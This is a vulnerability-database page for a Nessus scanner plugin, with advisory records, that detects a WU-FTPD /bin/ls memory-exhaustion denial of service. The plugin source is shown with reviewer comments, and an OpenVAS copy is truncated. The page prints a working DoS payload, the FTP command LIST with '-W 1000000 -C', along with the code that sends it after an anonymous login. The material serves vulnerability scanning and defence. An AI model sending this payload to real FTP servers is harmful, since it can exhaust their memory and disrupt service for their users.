WU-FTPD fileutils/coreutils ls -w Argument Memory Consumption DoS
2003-10-29T00:00:00
ID WUFTPD_LS_DOS.NASL Type nessus Reporter This script is Copyright (C) 2003-2019 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2021-01-02T00:00:00
Description
The version of WU-FTPD on the remote server uses a vulnerable version
of /bin/ls. WU-FTPD does not filter the arguments it passes to /bin/ls,
which could lead to a DoS. It is possible to consume all available
memory on the machine by sending:
ls '-w 1000000 -C'
#
# (C) Tenable Network Security, Inc.
#
# HD Moore suggested fixes and the safe_checks code.
# It is released under the General Public License (GPLv2).
#
# Credit: Georgi Guninski discovered this attack
#
include("compat.inc");
# Plugin registration block. It runs only when `description` is true: it
# records the plugin's metadata through the script_* calls and then exits,
# so none of the network code further down the file is reached on this pass.
if (description)
{
script_id(11912);
script_version("1.24");
script_cvs_date("Date: 2019/02/26 4:50:08");
# Two CVE ids are attached to this one check; both concern the handling of
# a large width argument by ls (see the plugin name below).
script_cve_id("CVE-2003-0853", "CVE-2003-0854");
script_bugtraq_id(8875);
# The two xrefs below are commented out rather than removed: the plugin
# validator flags them as invalid, which prevents the build from completing.
# script_xref(name:"CONECTIVA", value:"CLA-2003:768");
# script_xref(name:"zone-h", value:"3299");
script_xref(name:"Secunia", value:"10059");
script_name(english:"WU-FTPD fileutils/coreutils ls -w Argument Memory Consumption DoS");
script_summary(english:"send 'ls -w 1000000 -C' to the remote FTP server.");
script_set_attribute(attribute:"synopsis", value:
"The remote FTP server is affected by a denial of service
vulnerability." );
script_set_attribute(attribute:"description", value:
"The version of WU-FTPD on the remote server uses a vulnerable version
of /bin/ls. It does not filter arguments to /bin/ls, which could lead
to a DoS. It is possible to consume all available memory on the
machine by sending :
ls '-w 1000000 -C'" );
script_set_attribute(attribute:"see_also", value:"http://www.guninski.com/binls.html" );
# NOTE(review): the remediation text is generic. The plugin name and
# description place the flaw in /bin/ls (fileutils/coreutils), so the fix
# presumably ships in that package rather than in WU-FTPD itself - confirm
# against the vendor advisory for the affected platform.
script_set_attribute(attribute:"solution", value:
"Contact your vendor for a fix." );
# Severity as rated by the plugin: network reachable, low complexity, no
# authentication, availability impact only (A:C in CVSSv2, A:H in CVSSv3).
# NOTE(review): the rating is attributed to CVE-2003-0853 via
# cvss_score_source below; compare it with the CVE record's own vector
# before using it for prioritisation.
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2003-0853");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"plugin_publication_date", value: "2003/10/29");
script_set_attribute(attribute:"vuln_publication_date", value: "2003/05/16");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
# ACT_MIXED_ATTACK: the check body calls safe_checks() and picks between a
# non-disruptive option probe and the memory-exhaustion LIST request.
script_category(ACT_MIXED_ATTACK);
script_family(english: "FTP");
script_copyright(english:"This script is Copyright (C) 2003-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
# The check body reads the "ftp/login" and "ftp/password" knowledge-base
# items; presumably these two dependencies are what populate them - verify.
script_dependencies("ftpserver_detect_type_nd_version.nasl", "ftp_anonymous.nasl");
script_require_ports("Services/ftp", 21);
# Leave here so that registration never falls through into the live check.
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("ftp_func.inc");
# Check body. Order of operations: confirm a WU-FTPD banner, log in, open a
# passive data connection, then either (a) probe how LIST options are handled
# without stressing the host, or (b) send the large-width LIST request and
# observe whether the service is still usable afterwards.
port = get_ftp_port(default: 21);
banner = get_ftp_banner(port:port);
# Banner gate: the check proceeds only when the banner contains "wu-" or
# "wuftpd-" followed by a digit and a dot. A server whose banner has been
# changed or suppressed is therefore not assessed by this plugin at all;
# absence of a finding is not evidence that ls arguments are filtered.
if ( !banner ) audit(AUDIT_NO_BANNER, port);
if ( !egrep(pattern:"(wu|wuftpd)-[0-9]\.", string:banner) )
audit(AUDIT_NOT_LISTEN, 'WU-FTPD', port);
# Credentials come from the knowledge base. When either one is missing the
# script falls back to an anonymous login, unless supplied_logins_only is
# set, in which case it stops through audit() instead of guessing.
user = get_kb_item("ftp/login");
pass = get_kb_item("ftp/password");
if (! user)
{
if (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);
user = "anonymous";
}
if (! pass)
{
if (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);
# Detection note: sessions from this check present this address as the
# anonymous password, which some FTP servers write to their login log.
pass = "nessus@nessus.org";
}
soc = ftp_open_and_authenticate( user:user, pass:pass, port:port );
# A failed connection or login ends the script with exit code 0 and no
# message, so the host is left unassessed rather than reported as clean.
if (!soc) exit(0);
# LIST output travels over a separate data connection; request a passive
# port from the server and connect to it.
port2 = ftp_pasv(socket:soc);
if (!port2)
{
ftp_close(socket: soc);
exit(1, "PASV command failed on port "+port+".");
}
soc2 = open_sock_tcp(port2, transport: ENCAPS_IP);
# Non-disruptive path, taken when the data connection could not be opened or
# when safe_checks() is true. A LIST carrying a run of option letters is sent
# and one reply line is read from the control connection; a reply containing
# "invalid option" or "usage:" (case-insensitive) is reported.
# NOTE(review): this is indirect evidence. It shows that the option text
# reached an ls-style option parser, not that the width argument exhausts
# memory on this host - treat a hit from this path as needing confirmation.
if (!soc2 || safe_checks())
{
send(socket: soc, data: 'LIST -ABCDEFGHIJKLMNOPQRSTUV\r\n');
r1 = ftp_recv_line(socket:soc);
if (egrep(string: r1, pattern: "invalid option|usage:", icase: 1))
security_hole(port);
if(soc2)close(soc2);
ftp_close(socket: soc);
exit(0);
}
# Disruptive path: reached only with safe checks disabled and a working data
# connection. start_denial()/end_denial() bracket the request; end_denial()
# returns the value tested as `alive` below (presumably a liveness probe of
# the target - confirm against the scanner's documentation).
start_denial();
# NOTE(review): the option letter sent here is upper-case "-W", while the
# plugin summary and description text show lower-case "-w". Confirm which
# form is intended; the two are not interchangeable in every ls build.
send(socket:soc, data: 'LIST "-W 1000000 -C"\r\n');
# r1 is read to keep the control dialogue in step but is not inspected in
# this path; the listing on the data connection is received and discarded.
r1 = ftp_recv_line(socket:soc);
ftp_recv_listing(socket: soc2);
# r2 is the next control-connection reply and is the one examined below.
r2 = ftp_recv_line(socket:soc);
close(soc2);
ftp_close(socket: soc);
alive = end_denial();
# Signal 1: end_denial() reports the target as no longer alive.
if (! alive)
{
security_hole(port);
exit(0);
}
# Signal 2: the server's reply mentions "exhausted" or "failed"
# (case-insensitive).
if (egrep(string: r2, pattern: "exhausted|failed", icase: 1))
{
security_hole(port);
exit(0);
}
# Signal 3: a fresh login with the same credentials no longer succeeds.
# NOTE(review): any unrelated connection or login failure at this point is
# reported as the vulnerability as well, so a finding raised here should be
# confirmed (for example against the installed ls package version) before
# it is acted on.
soc = ftp_open_and_authenticate( user:user, pass:pass, port:port );
if ( !soc )
{
security_hole(port);
}
if (soc) ftp_close(socket: soc);
{"id": "WUFTPD_LS_DOS.NASL", "bulletinFamily": "scanner", "title": "WU-FTPD fileutils/coreutils ls -w Argument Memory Consumption DoS", "description": "The version of WU-FTPD on the remote server uses a vulnerable version\nof /bin/ls. It does not filter arguments to /bin/ls, which could lead\nto a DoS. It is possible to consume all available memory on the\nmachine by sending :\n\nls '-w 1000000 -C'", "published": "2003-10-29T00:00:00", "modified": "2021-01-02T00:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "href": "https://www.tenable.com/plugins/nessus/11912", "reporter": "This script is Copyright (C) 2003-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.guninski.com/binls.html"], "cvelist": ["CVE-2003-0853", "CVE-2003-0854"], "type": "nessus", "lastseen": "2021-01-01T07:01:06", "edition": 25, "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2003-0853", "CVE-2003-0854"]}, {"type": "redhat", "idList": ["RHSA-2003:310"]}, {"type": "openvas", "idList": ["OPENVAS:11912", "OPENVAS:53532", "OPENVAS:136141256231011912"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2003-310.NASL", "DEBIAN_DSA-705.NASL", "FEDORA_2004-091.NASL", "MANDRAKE_MDKSA-2003-106.NASL"]}, {"type": "osvdb", "idList": ["OSVDB:4621", "OSVDB:4620"]}, {"type": "exploitdb", "idList": ["EDB-ID:115", "EDB-ID:23274"]}, {"type": "debian", "idList": ["DEBIAN:DSA-705-1:CDBB7"]}], "modified": "2021-01-01T07:01:06", "rev": 2}, "score": {"value": 6.2, "vector": "NONE", "modified": "2021-01-01T07:01:06", "rev": 2}, "vulnersScore": 6.2}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# HD Moore suggested fixes and the safe_checks code.\n# It is released under the General Public License (GPLv2).\n#\n# Credit: Georgi Guninski discovered this attack\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11912);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2019/02/26 
4:50:08\");\n\n script_cve_id(\"CVE-2003-0853\", \"CVE-2003-0854\");\n script_bugtraq_id(8875);\n # commenting these out instead of removing\n # these xrefs get flaged as invalid by validate plugin\n # preventing build from completing\n # script_xref(name:\"CONECTIVA\", value:\"CLA-2003:768\");\n # script_xref(name:\"zone-h\", value:\"3299\");\n script_xref(name:\"Secunia\", value:\"10059\");\n\n script_name(english:\"WU-FTPD fileutils/coreutils ls -w Argument Memory Consumption DoS\");\n script_summary(english:\"send 'ls -w 1000000 -C' to the remote FTP server.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FTP server is affected by a denial of service\nvulnerability.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The version of WU-FTPD on the remote server uses a vulnerable version\nof /bin/ls. It does not filter arguments to /bin/ls, which could lead\nto a DoS. It is possible to consume all available memory on the\nmachine by sending :\n\nls '-w 1000000 -C'\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.guninski.com/binls.html\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Contact your vendor for a fix.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2003-0853\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2003/10/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2003/05/16\");\n \n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n 
script_end_attributes();\n\n script_category(ACT_MIXED_ATTACK);\n script_family(english: \"FTP\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ftpserver_detect_type_nd_version.nasl\", \"ftp_anonymous.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"ftp_func.inc\");\n\nport = get_ftp_port(default: 21);\n\nbanner = get_ftp_banner(port:port);\n\nif ( !banner ) audit(AUDIT_NO_BANNER, port);\nif ( !egrep(pattern:\"(wu|wuftpd)-[0-9]\\.\", string:banner) )\n audit(AUDIT_NOT_LISTEN, 'WU-FTPD', port);\n\nuser = get_kb_item(\"ftp/login\");\npass = get_kb_item(\"ftp/password\");\n\nif (! user)\n{\n if (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n user = \"anonymous\";\n}\nif (! pass)\n{\n if (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n pass = \"nessus@nessus.org\";\n}\n\nsoc = ftp_open_and_authenticate( user:user, pass:pass, port:port );\nif (!soc) exit(0);\n\nport2 = ftp_pasv(socket:soc);\nif (!port2)\n{\n ftp_close(socket: soc);\n exit(1, \"PASV command failed on port \"+port+\".\");\n}\n\nsoc2 = open_sock_tcp(port2, transport: ENCAPS_IP);\n\nif (!soc2 || safe_checks())\n{\n send(socket: soc, data: 'LIST -ABCDEFGHIJKLMNOPQRSTUV\\r\\n');\n r1 = ftp_recv_line(socket:soc);\n if (egrep(string: r1, pattern: \"invalid option|usage:\", icase: 1))\n security_hole(port);\n if(soc2)close(soc2);\n ftp_close(socket: soc);\n exit(0);\n}\n\nstart_denial();\n\nsend(socket:soc, data: 'LIST \"-W 1000000 -C\"\\r\\n');\nr1 = ftp_recv_line(socket:soc);\nftp_recv_listing(socket: soc2);\nr2 = ftp_recv_line(socket:soc);\nclose(soc2);\nftp_close(socket: soc);\n\nalive = end_denial();\nif (! 
alive)\n{\n security_hole(port);\n exit(0);\n}\n\nif (egrep(string: r2, pattern: \"exhausted|failed\", icase: 1))\n{\n security_hole(port);\n exit(0);\n}\n\nsoc = ftp_open_and_authenticate( user:user, pass:pass, port:port );\nif ( !soc )\n{\n security_hole(port);\n}\nif (soc) ftp_close(socket: soc);\n", "naslFamily": "FTP", "pluginID": "11912", "cpe": [], "scheme": null, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}}
{"cve": [{"lastseen": "2020-10-03T11:33:03", "description": "ls in the fileutils or coreutils packages allows local users to consume a large amount of memory via a large -w value, which can be remotely exploited via applications that use ls, such as wu-ftpd.", "edition": 3, "cvss3": {}, "published": "2003-11-17T05:00:00", "title": "CVE-2003-0854", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0854"], "modified": "2017-10-11T01:29:00", "cpe": ["cpe:/a:washington_university:wu-ftpd:2.6.1", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr4", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr6", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr14", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr9", "cpe:/a:gnu:fileutils:4.0", "cpe:/a:washington_university:wu-ftpd:2.6.2", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta2", "cpe:/a:washington_university:wu-ftpd:2.4.2_vr17", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr8", "cpe:/a:gnu:fileutils:4.0.36", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr12", "cpe:/a:washington_university:wu-ftpd:2.6.0", "cpe:/a:gnu:fileutils:4.1.6", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr5", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr11", "cpe:/a:washington_university:wu-ftpd:2.5.0", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr7", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr13", "cpe:/a:washington_university:wu-ftpd:2.4.2_vr16", 
"cpe:/a:washington_university:wu-ftpd:2.4.1", "cpe:/a:gnu:fileutils:4.1.7", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr15", "cpe:/a:gnu:fileutils:4.1", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr10"], "id": "CVE-2003-0854", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0854", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr5:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr14:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:fileutils:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr7:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr15:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:fileutils:4.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta2:*:academ:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr4:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr10:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:fileutils:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr12:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr8:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18:*:academ:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr13:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:fileutils:4.0.36:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:fileutils:4.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr9:*:*:*:*:*:*:*", 
"cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr11:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_vr17:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_vr16:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:33:03", "description": "An integer overflow in ls in the fileutils or coreutils packages may allow local users to cause a denial of service or execute arbitrary code via a large -w value, which could be remotely exploited via applications that use ls, such as wu-ftpd.", "edition": 3, "cvss3": {}, "published": "2003-11-17T05:00:00", "title": "CVE-2003-0853", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0853"], "modified": "2008-09-10T19:20:00", "cpe": ["cpe:/a:washington_university:wu-ftpd:2.6.1", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr4", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr6", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr14", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr9", "cpe:/a:gnu:fileutils:4.0", "cpe:/a:washington_university:wu-ftpd:2.6.2", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta2", "cpe:/a:washington_university:wu-ftpd:2.4.2_vr17", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr8", "cpe:/a:gnu:fileutils:4.0.36", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr12", "cpe:/a:washington_university:wu-ftpd:2.6.0", "cpe:/a:gnu:fileutils:4.1.6", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr5", 
"cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr11", "cpe:/a:washington_university:wu-ftpd:2.5.0", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr7", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr13", "cpe:/a:washington_university:wu-ftpd:2.4.2_vr16", "cpe:/a:washington_university:wu-ftpd:2.4.1", "cpe:/a:gnu:fileutils:4.1.7", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr15", "cpe:/a:gnu:fileutils:4.1", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr10"], "id": "CVE-2003-0853", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0853", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr5:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr14:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:fileutils:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr7:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr15:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:fileutils:4.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta2:*:academ:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr4:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr10:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:fileutils:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr12:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr8:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18:*:academ:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr13:*:*:*:*:*:*:*", 
"cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:fileutils:4.0.36:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:fileutils:4.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr9:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr11:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_vr17:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_vr16:*:*:*:*:*:*:*"]}], "redhat": [{"lastseen": "2019-08-13T18:46:41", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0853", "CVE-2003-0854"], "description": "The fileutils package contains several basic system utilities. One of\nthese utilities is the \"ls\" program, which is used to list information\nabout files and directories. \n\nGeorgi Guninski discovered a memory starvation denial of service\nvulnerability in the ls program. It is possible to make ls allocate a\nhuge amount of memory by specifying certain command line arguments. This\nvulnerability is remotely exploitable through services like wu-ftpd, which\npass user arguments to ls. The Common Vulnerabilities and Exposures\nproject (cve.mitre.org) has assigned the name CAN-2003-0854 to this issue.\n\nA non-exploitable integer overflow in ls has been discovered. It is\npossible to make ls crash by specifying certain command line arguments. \nThis vulnerability is remotely exploitable through services like wu-ftpd,\nwhich pass user arguments to ls. 
The Common Vulnerabilities and Exposures\nproject (cve.mitre.org) has assigned the name CAN-2003-0853 to this issue.\n\nUsers are advised to update to these erratum packages, which contain\nbackported security patches that correct these vulnerabilities.\n\nThese packages also add support for the O_DIRECT flag, which controls the\nuse of synchronous I/O on file systems such as OCFS.", "modified": "2018-03-14T19:26:45", "published": "2003-11-12T05:00:00", "id": "RHSA-2003:310", "href": "https://access.redhat.com/errata/RHSA-2003:310", "type": "redhat", "title": "(RHSA-2003:310) fileutils security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "openvas": [{"lastseen": "2017-07-02T21:10:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0853", "CVE-2003-0854"], "description": "The FTP server does not filter arguments to the ls command. \nIt is possible to consume all available memory on the machine \nby sending \n\tls '-w 1000000 -C'\nSee http://www.guninski.com/binls.html", "modified": "2017-05-01T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:11912", "href": "http://plugins.openvas.org/nasl.php?oid=11912", "type": "openvas", "title": "wu-ftpd ls -W memory exhaustion", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: wuftpd_ls_DoS.nasl 6053 2017-05-01 09:02:51Z teissa $\n# Description: wu-ftpd ls -W memory exhaustion\n#\n# Authors:\n# Michel Arboi <arboi@alussinan.org>\n# HD Moore suggested fixes and the safe_checks code.\n#\n# Copyright:\n# Copyright (C) 2003 Michel Arboi\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_solution = \"Contact your vendor for a fix\";\n\ntag_summary = \"The FTP server does not filter arguments to the ls command. \nIt is possible to consume all available memory on the machine \nby sending \n\tls '-w 1000000 -C'\nSee http://www.guninski.com/binls.html\";\n\n# Credit: Georgi Guninski discovered this attack\n\n\nif (description)\n{\n script_id(11912);\n script_version(\"$Revision: 6053 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-05-01 11:02:51 +0200 (Mon, 01 May 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(8875);\n script_cve_id(\"CVE-2003-0853\", \"CVE-2003-0854\");\n script_xref(name: \"CONECTIVA\", value: \"CLA-2003:768\");\n script_xref(name: \"zone-h\", value: \"3299\");\n\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n name = \"wu-ftpd ls -W memory exhaustion\";\n script_name( name);\n\n\n\n script_category(ACT_MIXED_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family( \"FTP\");\n\n script_copyright(\"Copyright (C) 2003 Michel Arboi\");\n script_dependencies(\"find_service.nasl\", \"secpod_ftp_anonymous.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n exit(0);\n}\n\n\n#\n\ninclude(\"ftp_func.inc\");\n\nport = get_kb_item(\"Services/ftp\");\nif (!port) port = 21;\nif (!get_port_state(port)) exit(0);\n\nuser = get_kb_item(\"ftp/login\");\npass = get_kb_item(\"ftp/password\");\n\nif (! user) user = \"anonymous\";\nif (! 
